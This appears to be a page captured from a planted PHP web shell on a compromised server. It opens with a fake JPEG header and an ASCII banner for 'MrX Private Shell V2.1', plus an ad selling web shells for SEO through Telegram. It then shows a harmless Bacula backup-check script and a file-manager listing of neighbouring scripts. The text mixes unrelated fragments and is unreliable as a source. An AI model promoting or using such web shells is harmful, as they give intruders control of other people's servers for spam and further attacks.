����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# Check that bacula is installed and configuration files exist
# First determine whether we need to restore using bconsole or bextract.
if [ "$BEXTRACT_DEVICE" -o "$BEXTRACT_VOLUME" ]; then
### Bacula support using bextract
if [ -z "$BEXTRACT_VOLUME" ]; then
BEXTRACT_VOLUME=*
fi
[ -x $BACULA_BIN_DIR/bextract ] || Error "Bacula executable (bextract) missing or not executable"
[ -s $BACULA_CONF_DIR/bacula-sd.conf ] || Error "Bacula configuration file (bacula-sd.conf) missing"
else
### Bacula support using bconsole
[ -x $BACULA_BIN_DIR/bacula-fd ] || Error "Bacula executable (bacula-fd) missing or not executable"
[ -s $BACULA_CONF_DIR/bacula-fd.conf ] || Error "Bacula configuration file (bacula-fd.conf) missing"
[ -x $BACULA_BIN_DIR/bconsole ] || Error "Bacula executable (bconsole) missing or not executable"
[ -s $BACULA_CONF_DIR/bconsole.conf ] || Error "Bacula configuration file (bconsole.conf) missing"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 030_bextract_tape_device.sh | File | 604 B | 0644 |
|
| 050_check_requirements.sh | File | 968 B | 0644 |
|
| 100_start_bacula-fd.sh | File | 447 B | 0644 |
|